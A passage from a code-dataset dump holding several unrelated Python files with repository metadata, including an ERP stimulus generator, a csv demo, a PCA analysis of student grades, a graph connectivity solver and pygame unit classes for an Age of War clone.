0.\n\n word_delays = rand_unif(*self.word_delay_range, num_words)\n word_delays[0] = 0.\n\n if align_sample_rate is not None:\n phoneme_durations = align_to_sample_rate(phoneme_durations, align_sample_rate)\n word_delays = align_to_sample_rate(word_delays, align_sample_rate)\n\n # Remaining variables are deterministic derivatives on the above.\n\n phoneme_onsets = torch.cat([\n torch.zeros(num_words, 1),\n phoneme_durations.cumsum(dim=1)[:, :-1]\n ], dim=1)\n phoneme_offsets = phoneme_durations.cumsum(dim=1)\n\n word_durations = phoneme_offsets[:, -1] - phoneme_onsets[:, 0]\n\n # Mask out phonemes past word length\n phoneme_onsets[torch.arange(max_num_phonemes) >= word_lengths.unsqueeze(1)] = 0.\n phoneme_offsets[torch.arange(max_num_phonemes) > word_lengths.unsqueeze(1)] = 0.\n\n out_of_bounds_mask = torch.arange(max_num_phonemes).unsqueeze(0) >= word_lengths.unsqueeze(1)\n assert (out_of_bounds_mask[:, 1:] | (phoneme_offsets[:, :-1] <= phoneme_onsets[:, 1:])).all().item()\n\n word_onsets = (torch.cat([torch.tensor([self.first_onset]),\n word_durations[:-1]])\n + word_delays).cumsum(0)\n word_offsets = word_onsets + word_durations\n\n assert (word_offsets[:-1] < word_onsets[1:]).all().item()\n \n # Make phoneme_onsets global (not relative to word onset).\n phoneme_onsets_global = phoneme_onsets + word_onsets.view(-1, 1)\n\n return phoneme_onsets, phoneme_onsets_global, word_onsets, word_offsets\n\n\ndef rand_unif(low, high, *shape) -> torch.Tensor:\n return torch.rand(*shape) * (high - low) + low\n\n\nclass RandomStimulusGenerator(StimulusGenerator):\n\n def __init__(self,\n num_words: int = 100,\n num_candidates: int = 10,\n num_phonemes: int = 5,\n phoneme_voc_size: int = 18,\n word_surprisal_params: Tuple[float, float] = (1., 0.5),\n **kwargs):\n super().__init__(**kwargs)\n\n self.num_words = num_words\n self.num_candidates = num_candidates\n self.num_phonemes = num_phonemes\n self.word_surprisal_params = word_surprisal_params\n\n # Generate phoneme set\n self.phonemes = np.array(list(\"abcdefghijklmnopqrstuvwxyz\"[:phoneme_voc_size - 1] + \"_\"))\n self.phoneme2idx = {p: idx for idx, p in enumerate(self.phonemes)}\n\n def __call__(self, **stream_kwargs) -> Stimulus:\n word_lengths = 1 + dist.Binomial(self.num_phonemes - 1, 0.5) \\\n .sample((self.num_words, self.num_candidates)).long() # type: ignore\n gt_word_lengths = word_lengths[:, 0]\n\n candidate_phonemes = torch.randint(0, len(self.phonemes) - 2,\n (self.num_words,\n self.num_candidates,\n self.num_phonemes))\n # Use padding token when word length exceeded.\n # TODO can have candidates with different lengths\n pad_idx = self.phoneme2idx[\"_\"]\n pad_mask = (torch.arange(self.num_phonemes) >= word_lengths[:, :, None])\n candidate_phonemes[pad_mask] = pad_idx\n\n phoneme_onsets, phoneme_onsets_global, word_onsets, word_offsets = \\\n self.sample_stream(gt_word_lengths, self.num_phonemes, **stream_kwargs)\n\n word_surprisals: torch.Tensor = dist.LogNormal(*self.word_surprisal_params) \\\n .sample((self.num_words,)) # type: ignore\n\n # Calculate p_candidates using surprisal; allocate remainder randomly\n p_gt_word = (-word_surprisals).exp()\n remainder = 1 - p_gt_word\n p_candidates = (remainder / (self.num_candidates - 1)).view(-1, 1) \\\n * torch.ones(self.num_words, self.num_candidates - 1)\n p_candidates = torch.cat([p_gt_word.view(-1, 1), p_candidates], dim=1) \\\n .log()\n\n return Stimulus(gt_word_lengths, phoneme_onsets, phoneme_onsets_global,\n word_onsets, word_offsets,\n word_surprisals, p_candidates, candidate_phonemes)\n\n\nclass NaturalLanguageStimulusGenerator(StimulusGenerator):\n\n def __init__(self, *args, **kwargs):\n super().__init__()\n self.processor = NaturalLanguageStimulusProcessor(*args, **kwargs)\n\n def __call__(self, tokens: List[str],\n word_features: Dict[int, torch.Tensor],\n word_to_token: Optional[Dict[int, List[int]]] = None,\n ground_truth_phonemes: Optional[Dict[int, List[str]]] = None) -> Stimulus:\n\n if word_to_token is None:\n # Assume words are the same as tokens\n assert len(word_features) == len(tokens)\n word_to_token = {idx: [idx] for idx in word_features}\n \n nl_stim = self.processor(tokens, word_to_token, word_features, ground_truth_phonemes)\n\n max_num_phonemes = nl_stim.candidate_phonemes.shape[2]\n phoneme_onsets, phoneme_onsets_global, word_onsets, word_offsets = \\\n self.sample_stream(nl_stim.word_lengths, max_num_phonemes)\n\n return Stimulus(\n nl_stim.word_lengths, phoneme_onsets, phoneme_onsets_global,\n word_onsets, word_offsets,\n nl_stim.word_surprisals, nl_stim.p_candidates, nl_stim.candidate_phonemes\n )","repo_name":"hans/bayesian-erp","sub_path":"berp/generators/stimulus.py","file_name":"stimulus.py","file_ext":"py","file_size_in_byte":7998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11266179995","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n\n'''\n测试csv库demo示例\n'''\nimport csv\n\n# csv.reader类\n# 官方解释可以任意可迭代的对象,也可以是文件(open文件需要参数newline,定义行与行的分割界限)\n\n\ndef test_reader():\n with open(\"userscore.csv\", newline='') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=' ', quotechar='|')\n for row in csvreader:\n print(','.join(row))\n\n\ndef test_writer():\n with open(\"eggs.csv\", 'w', newline='') as csvfile:\n csvwriter = csv.writer(csvfile, delimiter=' ', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n csvwriter.writerow(['spam'] * 5 + ['Baked Beans'])\n csvwriter.writerow(['Spam', 'Lovely Spam', 'Wonderful Spam'])\n\n\ndef test_writer_2():\n with open('mydata.csv', 'w', newline='') as file:\n writer = csv.writer(file)\n writer.writerow(['id', 'name', 'age'])\n writer.writerow(['10002', 'LiSi', '20'])\n writer.writerow(['10001', 'ZhangSan', 18])\n\n\ndef csv_dict_write(path, head, data):\n with open(path, 'w', encoding='utf-8', newline='') as f:\n writer = csv.DictWriter(f, head)\n writer.writeheader()\n writer.writerows(data)\n return True\n\n\ndef csv_dict_read(path):\n with open(path, 'r', encoding='utf-8') as f:\n reader = csv.DictReader(f, dialect='excel')\n for row in reader:\n print(row['Name'])\n\n\nif __name__ == \"__main__\":\n # test_reader()\n # test_writer()\n # test_writer_2()\n\n # head = ['Name', 'Age']\n # data = [\n # {'Name': 'Keys', 'Age': 28},\n # {'Name': 'HongPing', 'Age': 29},\n # {'Name': 'WenChao', 'Age': 15}\n # ]\n # csv_dict_write('test2.csv', head, data)\n\n csv_dict_read('test2.csv')\n\n","repo_name":"doever/rmms","sub_path":"rmms/baselibrary/demo_02_csv.py","file_name":"demo_02_csv.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"25252251452","text":"import math\n\nwith open(\"day_03/day_03.txt\") as f:\n data = [line.strip() for line in f.readlines()]\n\ngradients = [\n (1,1),\n (3,1),\n (5,1),\n (7,1),\n (1,2),\n]\n\ndef count_trees(gradient):\n\n tree_count = 0\n x = 0\n width = len(data[0])\n delta_x, delta_y = gradient\n\n for y in range(0, len(data), delta_y):\n if '#' in data[y][x % width]:\n tree_count +=1\n x += delta_x\n return tree_count\n\ntotal_trees = []\n\nfor i in gradients:\n total_trees.append(count_trees(i))\n\nprint(math.prod(total_trees))\n\n# Answer is: 6419669520","repo_name":"jmcharter/advent_of_code_2020","sub_path":"day_03/d3_part_two.py","file_name":"d3_part_two.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"35042624720","text":"# This exercise demonstrates a few concepts:\n# How computers store languages for display and processing\n# How you must encode and decode Python's strings into a type called bytes\n# How to handle errors in strings and byte-handling\n# How to read code and find out what it means even if I've never seen it before\n\nimport sys\nscript, input_encoding, error = sys.argv\n# There are a few error inputs we can accept. 'strict' will generate an exception and fail. Other could e.g. replace unencodable unicode with a '?'.\n\ndef main(language_file, encoding, errors):\n # We use the parameter 'encoding', though Python refers to a codec.\n # Examples are utf-8, utf-16, big5.\n line = language_file.readline()\n\n if line:\n print_line(line, encoding, errors) # Call the function below that runs on each line of the language file.\n return main(language_file, encoding, errors) # Go back to the main function and run it again. It will keep running for as long as there is another line to be read into the variable called line.\n\ndef print_line(line, encoding, errors):\n next_lang = line.strip() # strip() removes leading and trailing characters from a string input. E.g. line.strip(\",.abc\") would remove all instances of those 5 characters from the end of each line until reaching another type of character.\n raw_bytes = next_lang.encode(encoding, errors=errors) # If user inputs utf-8 as encoding, then this will encode the language name as utf-8\n cooked_string = raw_bytes.decode(encoding, errors=errors) # This decodes what we just encoded, using the same encoding. It should get us back to what we had, if our errors are strict.\n\n print(raw_bytes, \"<===>\", cooked_string) # When we print raw_bytes, we see a load of hexadecimal numbers for each byte, within a b'...' which indicates a byte-string. I guess this is like an f-string, but it's a b-string.\n\n\nlanguages = open(\"languages.txt\", encoding = \"utf-8\")\n\n# utf-8 means Unicode Transformation Format 8 Bits. Generally, using 32 bits to store every character is a waste of space. But sometimes we need the extra to render less-frequent languages such as Lithuanian. utf-8 is a form of compression encoding that solves for this issue.\n\n# Give the main function a file object (above), plus the user's argv inputs for encoding and error.\nmain(languages, input_encoding, error)\n\n# If we run this script with big5 encoding, Python doesn't have much fun. That's because our language file has lots of other characters in it. To make it work, we have to change the error setting to 'replace' - then Python just fills in ? for all the characters it can't handle in big5.\n","repo_name":"anglpf/python3","sub_path":"ex23.py","file_name":"ex23.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1860573661","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 21 15:13:21 2021\n\n@author: paulnelsonbecker\n\"\"\"\n\n\nimport numpy as np\nfrom scipy.linalg import svd\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom similarity import similarity,binarize\nfrom categoric2numeric import categoric2numeric\n\nfilename = 'student-mat2.csv'\ndf = pd.read_csv(filename, \";\")\n\n\n# =============================================================================\n# print(round(df.describe(),1))\n# # correlation matrix \n# corr = df.corr()\n# print(round(corr,1))\n# =============================================================================\n###########\nimport matplotlib.pyplot as plt \nimport seaborn as sns\n\n\n# =============================================================================\n# ##############\n# df.hist(column=['school','sex','Medu','Fedu','Mjob','Fjob','reason','guardian','traveltime','studytime','failures','schoolsup','famsup','paid','activities','higher','internet','goout','Dalc','Walc','health','absences','G3'],figsize=(10,10))\n# plt.savefig('distribution.png',dpi=300,bbox_inches='tight')\n# ################\n# sns.lineplot(df['G3'], df['absences'])\n# plt.savefig('lineplot.png',dpi=300,bbox_inches='tight')\n# ###############\n# fig, ax = plt.subplots(figsize=(10,10)) \n# sns.heatmap(round(df.corr(),1), annot=True)\n# plt.savefig('heatmap.png',dpi=300,bbox_inches='tight')\n# plt.show\n# =============================================================================\n\nraw_data = df.values \n\n\ncols = range(0, 26) \nX = raw_data[:, cols]\n\n\nattributeNames = np.asarray(df.columns[cols])\n#print(attributeNames)\n\nclassLabels = raw_data[:,-1] # -1 takes the last column\n\nclassNames = np.unique(classLabels)\nclassGroups = np.array([5,10,15,20])\n\nclassDict2 = dict(zip(classNames,np.array([0,0,0,1,1,1,1,1,2,2,2,2,2,3,3,3,3,3])))\nclassDict = dict(zip(classNames,range(len(classNames))))\n\n\ny = np.array([classDict[cl] for cl in classLabels])\n#####groups of grades##########\ny2 = np.array([classDict2[cl] for cl in classLabels])\n\n\nN, M = X.shape\n\nC = len(classNames)\n\n\npca_data = X\npca_names = attributeNames\n\n##Transform categoric variables to one-out-of-K coding:\n##MJOb\nX_num, attribute_names = categoric2numeric(pca_data[:,5])\nfirsthalfnames = np.concatenate((pca_names[0:5],attribute_names))\npca_names = np.concatenate((firsthalfnames,pca_names[6:26]))\nfirsthalf = np.concatenate((pca_data[:,0:5], X_num),axis=1)\npca_data = np.concatenate((firsthalf, pca_data[:,6:26]), axis=1)\n\n#print(pca_names)\n#print(pca_data.shape)\n\n##FJOB\nX_num, attribute_names = categoric2numeric(pca_data[:,10])\nfor i in range(len(attribute_names)):\n attribute_names[i] = 'F ' + attribute_names[i] \nfirsthalfnames = np.concatenate((pca_names[0:10],attribute_names))\npca_names = np.concatenate((firsthalfnames,pca_names[11:30]))\nfirsthalf = np.concatenate((pca_data[:,0:10], X_num),axis=1)\npca_data = np.concatenate((firsthalf, pca_data[:,11:30]), axis=1)\n\n\npca_names = np.concatenate((pca_names[0:15],pca_names[16:34]))\npca_data = np.concatenate((pca_data[:,0:15], pca_data[:,16:34]), axis=1)\n\ncount = 0;\n\n# Bin School\nfor i in range(N):\n if (pca_data[i,0]==\"GP\"):\n pca_data[i,0] = 1\n \n else:\n pca_data[i,0] = 0\n \n\n# Bin Female\nfor i in range(N):\n if (pca_data[i,1]==\"F\"):\n pca_data[i,1] = 1\n \n else:\n pca_data[i,1] = 0\n \n\n\n\n\n# Bin schoolsup\nfor i in range(N):\n if (pca_data[i,19]==\"yes\"):\n pca_data[i,19] = 1\n \n else:\n pca_data[i,19] = 0\n \n\n# Bin famsup\nfor i in range(N):\n if (pca_data[i,20]==\"yes\"):\n pca_data[i,20] = 1\n \n else:\n pca_data[i,20] = 0\n \n\n#BIn paid\nfor i in range(N):\n if (pca_data[i,21]==\"yes\"):\n pca_data[i,21] = 1\n \n else:\n pca_data[i,21] = 0\n \n \nfor i in range(N):\n if (pca_data[i,22]==\"yes\"):\n pca_data[i,22] = 1\n \n else:\n pca_data[i,22] = 0\n \n \nfor i in range(N):\n \n if (pca_data[i,23]==\"yes\"):\n pca_data[i,23] = 1\n \n else:\n pca_data[i,23] = 0\n \n \nfor i in range(N):\n if (pca_data[i,24]==\"yes\"):\n pca_data[i,24] = 1\n \n else:\n pca_data[i,24] = 0\n \nX_num, attribute_names = categoric2numeric(pca_data[:,15])\nfirsthalfnames = np.concatenate((pca_names[0:15],attribute_names))\npca_names = np.concatenate((firsthalfnames,pca_names[16:36]))\nfirsthalf = np.concatenate((pca_data[:,0:15], X_num),axis=1)\npca_data = np.concatenate((firsthalf, pca_data[:,16:36]), axis=1)\npca_data_noGrades = pca_data[:,0:32]\npca_names_noGrades = pca_names[0:32]\ny = pca_data[:,34]\n\ndf = pd.DataFrame(pca_data, columns=['school', 'sex','age', 'Medu', 'Fedu', 'at_home', 'health', 'other', 'services',\n 'teacher', 'F at_home', 'F health', 'F other', 'F services', 'F teacher',\n 'father','mother','other', 'traveltime', 'studytime', 'failures', 'schoolsup', 'famsup',\n 'paid', 'activities', 'higher', 'internet', 'goout', 'Dalc', 'Walc', 'health',\n 'absences', 'G1', 'G2', 'G3'])\n\n \n \n#WITHOUT GRADES:\npca_data = pca_data_noGrades\npca_names = pca_names_noGrades\ndf = pd.DataFrame(pca_data, columns=['school', 'sex','age', 'Medu', 'Fedu', 'at_home', 'health', 'other', 'services',\n 'teacher', 'F at_home', 'F health', 'F other', 'F services', 'F teacher',\n 'father','mother','other', 'traveltime', 'studytime', 'failures', 'schoolsup', 'famsup',\n 'paid', 'activities', 'higher', 'internet', 'goout', 'Dalc', 'Walc', 'health',\n 'absences'])\n\n\n\n\n\ndf.to_csv('k-encoding.csv',index=True)\n\nN, M = pca_data.shape\n\npca_data = pca_data.astype(np.int)\n\n#Y = pca_data - np.ones((N,1))*pca_data.mean(axis=0)\n#Y2 = Y*(1/np.std(Y,0))\nY2 = pca_data\n\n\n# =============================================================================\n# #####PLOT 1-STANDARD DEVIATION########\n# print(\"______________________________________\")\n# r = np.arange(1,pca_data.shape[1]+1)\n# plt.bar(r, np.std(pca_data,0))\n# plt.xticks(r, pca_names, rotation='vertical')\n# plt.ylabel('Standard deviation')\n# plt.xlabel('Attributes')\n# plt.title('Students: attribute standard deviations')\n# plt.savefig('std.png',dpi=300,bbox_inches='tight')\n# plt.show()\n# #####################\n# \n# =============================================================================\n\nU,S,V = svd(Y2,full_matrices=False)\n\n\n# Compute variance explained by principal components\nrho = (S*S) / (S*S).sum() \n\n# Compute the projection onto the principal components\nZ = U*S;\n######PLOT 1.5-Projected data#####\n# =============================================================================\n# C = len(classGroups)\n# for c in range(C):\n# plt.plot(Z[y2==c,0], Z[y2==c,1], '.', alpha=.5)\n# plt.xlabel('PC'+str(0+1))\n# plt.ylabel('PC'+str(1+1))\n# plt.title('Projection' )\n# plt.legend(classGroups)\n# plt.axis('equal')\n# plt.savefig('projection.png',dpi=300,bbox_inches='tight')\n# =============================================================================\n\n\n\nthreshold = 0.9\n\n#####PLOT 2-VARIANCE EXPLAINED########\n# =============================================================================\n# plt.figure()\n# plt.plot(range(1,len(rho)+1),rho,'x-')\n# plt.plot(range(1,len(rho)+1),np.cumsum(rho),'o-')\n# plt.plot([1,len(rho)],[threshold, threshold],'k--')\n# plt.title('Variance explained by principal components');\n# plt.xlabel('Principal component');\n# plt.ylabel('Variance explained');\n# plt.legend(['Individual','Cumulative','Threshold'])\n# plt.grid()\n# plt.savefig('variance.png',dpi=300,bbox_inches='tight')\n# plt.show()\n# \n# =============================================================================\n\n#####################PLOT 3-PCA Coefficients#####\n\n\n# =============================================================================\nvt = V.T\n# pcs = [0,1]\n# legendStrs = ['PC'+str(e+1) for e in pcs]\n# bw = .2\n# r = np.arange(1,M+1)\n# for i in pcs: \n# plt.bar(r+i*bw, vt[:,i], width=bw)\n# plt.xticks(r+bw, pca_names, rotation='vertical')\n# plt.xlabel('Attributes')\n# plt.ylabel('Component coefficients')\n# plt.legend(legendStrs)\n# plt.grid()\n# plt.title('PCA Component Coefficients')\n# plt.savefig('pcomponents.png',dpi=300,bbox_inches='tight')\n# plt.show()\n# =============================================================================\n\n# =============================================================================\npcs = [1]\nlegendStrs = ['PC'+str(e+1) for e in pcs]\nbw = .2\nr = np.arange(1,M+1)\nfor i in pcs: \n plt.bar(r+i*bw, vt[:,i], width=bw)\nplt.xticks(r+bw, pca_names, rotation='vertical')\nplt.xlabel('Attributes')\nplt.ylabel('Component coefficients')\nplt.legend(legendStrs)\nplt.grid()\nplt.title('PCA Component Coefficients')\nplt.show()\n# \n# =============================================================================\n\n\n\n# =============================================================================\n# #########Similarity school####\n# i=0\n# noti = list(range(0,2))+list(range(21,27))\n# print(pca_names[noti])\n# # Compute similarity between image i and all others\n# sim1 = similarity(pca_data[:,i], pca_data[:,noti].T, 'smc')\n# print(sim1)\n# \n# i=1\n# sim1 = similarity(pca_data[:,i], pca_data[:,noti].T, 'smc')\n# print(sim1)\n# \n# i=21\n# sim1 = similarity(pca_data[:,i], pca_data[:,noti].T, 'smc')\n# print(sim1)\n# \n# i=22\n# sim1 = similarity(pca_data[:,i], pca_data[:,noti].T, 'smc')\n# print(sim1)\n# \n# i=23\n# sim1 = similarity(pca_data[:,i], pca_data[:,noti].T, 'smc')\n# print(sim1)\n# \n# i=24\n# sim1 = similarity(pca_data[:,i], pca_data[:,noti].T, 'smc')\n# print(sim1)\n# \n# i=25\n# sim1 = similarity(pca_data[:,i], pca_data[:,noti].T, 'smc')\n# print(sim1)\n# \n# i=26\n# sim1 = similarity(pca_data[:,i], pca_data[:,noti].T, 'smc')\n# print(sim1)\n# \n# =============================================================================\n\n","repo_name":"schollenkopf/MachineLearning","sub_path":"project1.py","file_name":"project1.py","file_ext":"py","file_size_in_byte":9763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23879533596","text":"\nclass Graph:\n\n def __init__(self, vertices):\n self.V = vertices\n self.adj = [[] for i in range(vertices)]\n\n def addEdge(self, u, v):\n self.adj[u].append(v)\n self.adj[v].append(u)\n\n def DFS(self, v, visited):\n visited[v] = True\n for i in self.adj[v]:\n if visited[i] == False:\n self.DFS(i, visited)\n \n\n def connectedComponents(self):\n visited = [False] * (self.V)\n cc = 0\n for v in range(self.V):\n if visited[v] == False:\n cc += 1\n self.DFS(v, visited)\n return cc\n\n\nif __name__ == \"__main__\":\n t = int(input())\n for i in range(t):\n x = input()\n if(' ' not in x):\n m = int(input())\n n = int(x)\n else:\n n,m = x.split()\n g = Graph(int(n))\n for j in range(int(m)):\n x,y = map(int, input().split())\n g.addEdge(x-1, y-1)\n CC = g.connectedComponents()\n if(CC == 1):\n print(\"Caso #{}: a promessa foi cumprida\".format(i+1))\n else:\n print(\"Caso #{}: ainda falta(m) {} estrada(s)\".format(i+1, CC-1)) \n \n","repo_name":"projeto-de-algoritmos/Grafos1_Exerciciosresolvidos","sub_path":"1835/1835.py","file_name":"1835.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5627203119","text":"#! /usr/bin/env python\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\"\"\"\nPlots measures from the parser measures output\n\"\"\"\n\ndef plot_measures(csvfilename=None,datatable=None,select=[True,True,True],labels=None,row_indexes=None,label_rotation=45):\n \"\"\"\n Plots up to two measures for a given text.\n \n @param csvfilename: file where to find the data\n @param datatable : panda data frame where to find the data\n @param select : selects measures to plot [UnkWord,Surprisal,StructuralComplexity] at most two can be selected\n @param labels : labels for the measures on the plot\n @param row_indexes: a list of integer indexes that allows (discontinuous) subsetting of the data\n \"\"\"\n assert((not csvfilename is None) or (not datatable is None))\n assert(sum(select) <= 2)\n assert(len(labels) == sum(select))\n\n if csvfilename:\n df = pd.read_table(csvfilename,sep=\",\",index_col=0)\n elif datatable:\n df = datatable.copy()\n \n #col subsetting\n sub_idxes = [0]+[ idx+1 for idx, flag in enumerate(select) if flag]\n print(sub_idxes)\n df = df[df.columns[sub_idxes]]\n df.columns=['tokens']+labels\n \n #row subsetting\n df = df.iloc[row_indexes]\n df.set_index(\"tokens\",drop=True,inplace=True)\n print(df)\n if len(labels) > 1:\n axes = df.plot(title=' and '.join(labels)+' per word',secondary_y=labels[1],mark_right=False,kind='bar',rot=label_rotation) \n axes.set_ylabel('%s scale'%(labels[0]))\n axes.right_ax.set_ylabel('%s scale'%(labels[1]))\n else:\n axes = df.plot(title=labels[0]+' per word',kind='bar',rot=label_rotation)\n axes.set_ylabel(labels[0])\n axes.set_xlabel('')\n \nif __name__ == '__main__':\n plt.style.use('ggplot')\n plot_measures(csvfilename='exemple_measures.csv',select=[False,True,True],labels=['Surprisal','Complexity'],row_indexes=list(range(13,25)))\n plt.show()\n","repo_name":"bencrabbe/parsing_as_LM","sub_path":"rnng/plotting/plot_measures.py","file_name":"plot_measures.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"12398035340","text":"import pygame\nfrom pygame.image import load\nfrom settings import WARRIOR_PATH as warrior\nfrom settings import ARCHER_PATH as archer\nimport dataclasses\n@dataclasses.dataclass\nclass Status:\n cost: int\n health: int\n demage: int\n move_speed: int\n animation_time: int\n movement: bool\n attack: bool\n\nclass UnitsGroup(pygame.sprite.Group):\n def draw(self, surface, offset_x, offset_y):\n sprites = self.sprites()\n surface_blit = surface.blit\n for spr in sprites:\n self.spritedict[spr] = surface_blit(spr.image, (spr.rect.x + offset_x, spr.rect.y + offset_y))\n self.lostsprites = []\n\n\nclass SwordMan(pygame.sprite.Sprite):\n def __init__(self, pos_x, pos_y):\n super().__init__()\n # LOADING SPRITES\n self.name = \"SwordMan\"\n self.load_sprites()\n self.image = self.sword_man_walking[self.current_sword_man_sprite]\n self.rect = self.image.get_rect(topleft=(pos_x, pos_y))\n # SWORDMAN STATUS\n self.status = Status(15, 2000, 1700, 100, 8, True, False)\n self.vector_direction = pygame.math.Vector2(self.rect.topleft)\n\n def load_sprites(self):\n self.sword_man_walking = []\n self.sword_man_attack = []\n self.display_surface = pygame.display.get_surface()\n # LOADING SPRITES\n for img in range(10):\n self.sword_man_walking.append(\n load(f\"{warrior}walking/warrior{img}.png\").convert_alpha()\n )\n for img in range(11):\n self.sword_man_attack.append(load\n (f\"{warrior}attacking/attack{img}.png\").convert_alpha()\n )\n self.current_sword_man_sprite = 0\n self.attack_animation_sprite = 0\n\n def walking_animation(self, dt):\n if self.status.movement:\n self.current_sword_man_sprite += (self.status.animation_time * dt)\n if self.current_sword_man_sprite >= len(self.sword_man_walking):\n self.current_sword_man_sprite = 0\n\n def attacking_animations(self, dt, enemy):\n self.status.attack = True\n self.status.movement = False\n if self.status.attack:\n self.attack_animation_sprite += (self.status.animation_time * dt)\n if self.attack_animation_sprite >= len(self.sword_man_attack):\n self.attack_animation_sprite = 0\n if enemy == -1:\n self.image = pygame.transform.flip(self.sword_man_attack[int(self.attack_animation_sprite)], True,\n False)\n else:\n self.image = self.sword_man_attack[int(self.attack_animation_sprite)]\n\n def movement(self, dt, enemy):\n prev_x = self.vector_direction.x\n if self.status.movement:\n self.vector_direction.x += (self.status.move_speed * dt) * enemy\n self.rect.x = round(self.vector_direction.x)\n if self.vector_direction.x <= prev_x and enemy == -1:\n self.image = pygame.transform.flip(self.sword_man_walking[int(self.current_sword_man_sprite)], True, False)\n else:\n self.image = self.sword_man_walking[int(self.current_sword_man_sprite)]\n\n\n def stop_movement(self):\n self.status.movement = False\n\n\n def enabled_movement(self):\n self.status.movement = True\n\n\n def draw_hp(self,camera):\n hp_width = self.status.health / 40\n hp_height = 4\n offset_x = self.rect.x + camera + 8\n offset_y = self.rect.y + 80\n try:\n player_hp = pygame.Surface((hp_width, hp_height))\n player_hp.fill((255,0,0))\n self.display_surface.blit(player_hp,(offset_x,offset_y))\n except pygame.error:\n pass\n\n def demage(self):\n return self.status.demage\n \n def isattacked(self):\n if self.attack_animation_sprite > 8:\n return True\n return False\n \n\n def attack(self, dt, enemy):\n self.attacking_animations(dt, enemy)\n\n def update(self, dt, enemy):\n self.movement(dt, enemy)\n self.walking_animation(dt)\n\n\nclass Archer(pygame.sprite.Sprite):\n def __init__(self, pos_x, pos_y):\n super().__init__()\n # Loading sprites\n self.name = \"Archer\"\n self.load_sprites()\n self.image = self.archer_walking[self.index_walking_sprite]\n self.rect = self.image.get_rect(topleft=(pos_x, pos_y))\n # ARCHMAN STATUS\n self.status = Status(35, 3000, 1000, 50, 12, True, False)\n self.vector_direction = pygame.math.Vector2(self.rect.topleft)\n\n def load_sprites(self):\n self.display_surface = pygame.display.get_surface()\n self.archer_walking = []\n self.archer_attack = []\n for walk in range(10):\n self.archer_walking.append(load\n (f\"{archer}walk/player_walk{walk}.png\").convert_alpha()\n )\n for attack in range(10):\n self.archer_attack.append(load\n (f\"{archer}attack/attack{attack}.png\").convert_alpha()\n )\n self.index_walking_sprite = 0\n self.index_attacking_sprite = 0\n\n def walking_animation(self, dt):\n if self.status.movement:\n self.index_walking_sprite += (self.status.animation_time * dt)\n if self.index_walking_sprite >= len(self.archer_walking):\n self.index_walking_sprite = 0\n\n def attacking_animations(self, dt, isenemy):\n self.status.attack = True\n self.status.movement = False\n if self.status.attack:\n self.index_attacking_sprite += (self.status.animation_time * dt)\n if self.index_attacking_sprite >= len(self.archer_attack):\n self.index_attacking_sprite = 0\n if isenemy == 1:\n self.image = pygame.transform.flip(\n self.archer_attack[int(self.index_attacking_sprite)],\n True,\n False\n )\n else:\n self.image = self.archer_attack[int(self.index_attacking_sprite)]\n def release_arrow_time(self):\n if self.index_attacking_sprite > 8.0 and self.index_attacking_sprite < 9.0:\n return True\n return False\n def movement(self, dt, enemy):\n prev_x = self.vector_direction.x\n if self.status.movement:\n self.vector_direction.x += (self.status.move_speed * dt) * enemy\n self.rect.x = round(self.vector_direction.x)\n if self.vector_direction.x < prev_x and enemy == -1:\n self.image = pygame.transform.flip(self.archer_walking[int(self.index_walking_sprite)], True, False)\n else:\n self.image = self.archer_walking[int(self.index_walking_sprite)]\n\n def stop_movement(self):\n self.status.movement = False\n\n\n def enabled_movement(self):\n self.status.movement = True\n\n\n def draw_hp(self,camera):\n hp_width = self.status.health / 60\n hp_height = 4\n offset_x = self.rect.x + camera + 8\n offset_y = self.rect.y + 115\n try:\n player_hp = pygame.Surface((hp_width, hp_height))\n player_hp.fill((255,0,0))\n self.display_surface.blit(player_hp,(offset_x,offset_y))\n except pygame.error:\n pass\n \n def demage(self):\n return self.status.demage\n \n\n def isattacked(self):\n if self.index_attacking_sprite > 8:\n return True\n return False\n \n\n def attack(self, dt,isenemy):\n self.attacking_animations(dt, isenemy)\n\n def update(self, dt, enemy):\n self.movement(dt, enemy)\n self.walking_animation(dt)\n\n\nclass Dragon(pygame.sprite.Sprite):\n def __init__(self):\n super().__init__()\n pass\n","repo_name":"ediblelic/Age-of-War-Clone","sub_path":"code/unit.py","file_name":"unit.py","file_ext":"py","file_size_in_byte":7904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16181369607","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 4 14:56:07 2021\n\n@author: tpassmore6\n\"\"\"\n\n#%%\nimport geopandas as gpd\nimport pandas as pd\nimport numpy as np\nimport os\nimport time\npd.options.display.max_columns = None # display all columns\npd.options.display.max_rows = None # display all columns\nfrom shapely import wkt\nfrom shapely.wkt import dumps\nfrom shapely.ops import transform\nfrom shapely.ops import split, snap\nfrom shapely.geometry import Point, LineString, Polygon, MultiPoint, MultiLineString, mapping\nimport shapely\nimport pyproj\nfrom itertools import compress\nimport pickle\nfrom collections import Counter\nimport math\nfrom pathlib import Path\nfrom node_ids import start_node, end_node\n\n\ndef cleaning_process(links, nodes, name):\n \n #column names for A, B, and/or linkID\n mask = [f'{name}_A_B','geometry']\n \n #use mask to only keep neccessary columns\n links = links[mask]\n \n #rename geometry collumns\n links = 